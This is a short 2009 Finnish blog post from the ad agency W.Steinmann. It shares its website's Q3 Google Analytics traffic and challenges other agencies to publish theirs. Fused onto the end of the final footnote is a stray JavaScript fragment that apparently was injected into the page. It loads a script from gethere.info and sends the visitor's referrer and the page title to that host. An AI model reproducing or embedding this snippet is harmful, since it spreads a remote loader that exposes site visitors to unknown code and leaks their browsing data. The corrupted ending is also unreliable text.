2.10.2009

Google Analytics raportti wsteinmann.com Q3 2009

Neuvon usein asiakkaitamme, että verkossa tulee käyttäytyä avoimesti ja rehellisesti. Toiminnan läpinäkyvyys on elintärkeää merkityksellisen verkkoläsnäolon rakentamisessa. Vähempää ei siis voi vaatia meiltäkään.

Avasimme wsteinmann.comin heinäkuun alussa ja mielestämme kävijämäärät ja muut mittarit* näyttävät hyviltä. Kasvua on tapahtunut.. Meillä ei kuitenkaan ole tarpeeksi tietoa, että voisimme verrata edistystämme muihin mainostoimistoihin ja digitoimistoihin.

Haaste kaikille mainostoimistoille

Koska haluan kannustaa koko mainosalaa kehittymään, haastamme kaikki mainostoimistot kanssamme julkistamaan blogiensa/verkkosivustojensa käyttäjämäärät.

Jos muut toimistot lähtevät leikkiin mukaan, lupaan, että julkistamme kävijämäärämme 3kk välein. Kaikki mukaan, pois jääneitä pilkataan avoimesti sulkeutuneisuudestaan ja ymmärryksen puutteesta.

Mittarit yhtenäisiksi

Vertailun mahdollistamiseksi olen rajannut Google Analyticsin raportoimat luvut käsittämään 3kk ajanjakson 1.7.-30.9. Kävijämäärän näytämme viikkotasolla. Liitän mukaan myös tiedon, mistä ja minne kävijät ovat sivustollemme päätyneet ja mikä on ollut suosituinta sisältöä. Lisäksi mukana on tieto, kuinka kauan kävijät ovat sivustollamme viihtyneet.

Lataa PDF: wsteinmann.comin kävijätilastot Q3 2009

Uskallatteko te olla avoimia?

Timo Paloheimo on W.Steinmannin Digital Planner.

*) Tietenkään oman sivuston kävijätilastot eivät ole ainoita ja välttämättä parhaita mittareita verkkoläsnäolon kuvaamisessa (voin joskus toiste selittää miksi), mutta niillä mennään. Mikäli teillä on ehdotuksia paremmista mittareista, kommentoikaa.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ’&default_keyword=’ + encodeURIComponent(document.title) + ”;